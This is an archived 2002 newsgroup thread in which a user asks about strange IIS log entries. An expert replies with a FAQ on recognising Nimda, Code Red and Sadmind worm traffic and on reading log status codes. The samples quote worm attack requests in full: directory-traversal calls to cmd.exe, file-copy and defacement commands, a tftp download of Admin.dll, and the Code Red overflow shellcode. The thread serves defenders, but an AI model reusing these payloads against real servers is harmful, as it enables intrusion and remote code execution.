Re: Strange Log File Entries

From: George Hester (hesterloli@hotmail.com)
Date: 11/05/02


From: "George Hester" <hesterloli@hotmail.com>
Date: Tue, 5 Nov 2002 17:21:52 -0500


Excellent. Thanks.

--
George Hester
__________________________________
"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
news:uSYo7aHhCHA.2448@tkmsftngp11...
>
> "Jaffa" <jaffa@cakes.com> wrote in message
> news:OU6Yx9GhCHA.2508@tkmsftngp08...
> > Can anyone explain these entries in my log file? Is it a virus attack? I
> > have no idea where they came from and why they are trying to access
> cmd.exe.
> > I have Win2k SP3 installed, and all the other critical updates. X.X.X.X
is
> > my the IP address of my IIS server.
> >
> > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> > /winnt/system32/cmd.exe 404 3 144 124 0 - - -
> > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> > /winnt/system32/cmd.exe 404 3 144 91 0 - - -
> > 2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> > /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -
>
> Yes, looks like an old worm.  The codes 404 and 500 show that this was
> probably not successful.
>
> Note that not only do you need the latest updates, but you also need to
have
> your web server configured correctly, per the hardening windows 2000 and
IIS
> checklists at www.microsoft.com/technet/security, www.nsa.gov,
> http://rr.sans.org, etc.  It also sounds like you have not installed
> IISlockdown which includes URLScan, a very helpful tool in blocking this
> stuff.
>
> Read below for more info on reading your IIS logs:
>
> ================
>
> These are signs of well-known worms [the Code Red and/or Nimda worm] that
> spread from server to infected server.  Probably every web server on the
> Internet has received and will continue to receive these "attacks,"
perhaps
> several times a day, whether or not the servers are vulnerable to the
worm,
> even if firewalls and/or antivirus are being used.
>
> The IP address that is sending the requests to your server is likely
another
> infected web server and not necessarily a hacker.
>
> If you are seeing the log entries in the URLSCAN.LOG file, then URLScan
has
> successfully blocked that worm attack.  [However, the existence of URLScan
> does not necessarily prove that a computer is free of all viruses and
worms;
> for example, a computer that was infected with a worm before URLScan was
> installed could still be infected.]
>
> The best way to tell whether your server has been infected is to install
and
> use an antivirus program.
>
> It is not necessarily always accurate to deduce from the 200, 404 and 500
/
> 502 codes in a web server log whether or not the server has been infected.
> For more information on this, see the section in this FAQ entitled "I
found
> a code 200 [or 502] in my IIS logs, does that mean my web server has been
> successfully hacked?"
>
> For more information on these worm attacks, visit the web site of your
> favorite antivirus vendor and/or visit the links below:
>
> www.cert.org
> www.cve.mitre.org/cve
> www.nipc.gov
> www.eeye.com
> www.microsoft.com/technet/security
>
> Below are samples of what an IIS web server log would look like when
> attacked by a worm such as Nimda, Code Red and/or Sadmind / IIS worms:
>
>
> NIMDA LOOKS LIKE THIS    =======================
>
> [Note that the system is likely compromised if you see a code 200 in the
> line where the "tftp.exe" command is used to download the file
"Admin.dll,"
> as in the last line below.  Note however that the lines below containing
the
> "copy" and "echo" commands were also successful, despite the 502 code
which
> usually indicates failure.]
>
> GET /scripts/root.exe?/c+dir 200 -
> GET /MSADC/root.exe?/c+dir 200 -
> GET /c/winnt/system32/cmd.exe?/c+dir 200 -
> GET /d/winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET
>
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy
> stem32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 200 -
>
> GET /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
> GET /scripts/root.exe /c+echo+.././index.asp 502 -
>
> GET
>
/scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.
> dll%20d:\Admin.dll 200 -
>
>
> CODE RED LOOKS LIKE THIS:  =======================
>
> [Note that a code 200 after the "GET /default.ida?" line in a Code Red
> attack does not necessarily indicate success or failure.  It means that
the
> .ida mapping has not been removed from the IIS server, and it probably
> should be.]
>
> GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
> b%u53ff%u0078%u0000%u00=a
>
>
> CODE RED II LOOKS LIKE THIS:  ======================
>
> [Note that a code 200 after the "GET /default.ida?" line in a Code Red
> attack does not necessarily indicate success or failure.  It means that
the
> .ida mapping has not been removed from the IIS server, and it probably
> should be.]
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a 200 -
>
>
> SADMIND / IIS WORM LOOKS LIKE THIS:  ===============
>
> [Note that this is what the log looks like on a successfully compromised
> system - the code 502 after the "copy" and "echo" commands does not
indicate
> failure here, the commands were successful despite the 502.]
>
> GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
> GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
> GET /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
> GET /scripts/root.exe /c+echo+.././index.asp 502 -
>
> [Thanks to "Gurn" and others]
> ________________________________________________________
>
> (11.19) I found a code 200 [or 502] in my IIS logs, does that mean my web
> server has been successfully hacked?
>
> A:  Not necessarily.  Because of this uncertainty, the best way to tell
> whether your server has been infected is to install and use an antivirus
> program.
>
> Normally, a code 502 in an IIS web server log normally indicates that the
> request was unsuccessful.  However, in some cases, the code 502 does not
> indicate failure [for example the code 502 after the "copy" and "echo"
> commands used by the Sadmind / IIS Worm and Nimda].
>
> Similarly, a code 200 after a line in an IIS web server log indicates that
> the request was successful.  However, read the post below by Paul Lynch
> regarding a 200 code after a "GET /default.ida" request [as with the Code
> Red worm]:
>
> "...a lot of confusion surrounds the 200 return code in response to the
GET
> /default.ida request.
>
> In a nutshell what this means is that if you haven't removed the .ida
> mapping IIS processes the request successfully and returns a 200 to the
> browser.
>
> What it *doesn't* mean is that the worm has successfully penetrated your
> machine.  A patched Index Service will still return a 200 to a browser if
> the .ida mapping is present."
>
> A code 404 in the logs so far still appears to indicate an unsuccessful
> request [or attack], due to the attacker or worm requesting a file that
does
> not exist on the server.
>
> Again, because of this uncertainty, the best way to tell whether your
server
> has been infected is to install and use an antivirus program.
>
> [Thanks to Paul Lynch]
>
>
>


Relevant Pages

  • Re: Strange Log File Entries
    ... looks like an old worm. ... probably not successful. ... your web server configured correctly, per the hardening windows 2000 and IIS ... successfully blocked that worm attack. ...
    (microsoft.public.inetserver.iis.security)
  • Re: IIS Seperate Partition?
    ... >>codes to attack. ... >by the Code Red II worm. ... Nimda did NOT depend on Code ... Code Red was a buffer overrun in the Index Server ...
    (microsoft.public.inetserver.iis.security)
  • Re: strange entry in IIS log
    ... you got hit and the attack was successful. ... This is CodeRed virus which attack using buffer overflow technique. ... >>> web access I decided to open iis on our server. ... >>> Please reply to newsgroups only. ...
    (microsoft.public.inetserver.iis.security)
  • Re: Web server response to attacks
    ... >attack signatures in the log. ... >successful exploit, I am wondering if that is true. ... vulnerability scans showing whether the server was vulnerable). ... you may never see a log entry. ...
    (Focus-IDS)
  • Tcp/ip failing when server rebooted.
    ... I have an SBS 2003 that suffered an attack - possibly a worm ... - and since this time whenever the server is rebooted and ...
    (microsoft.public.windows.server.sbs)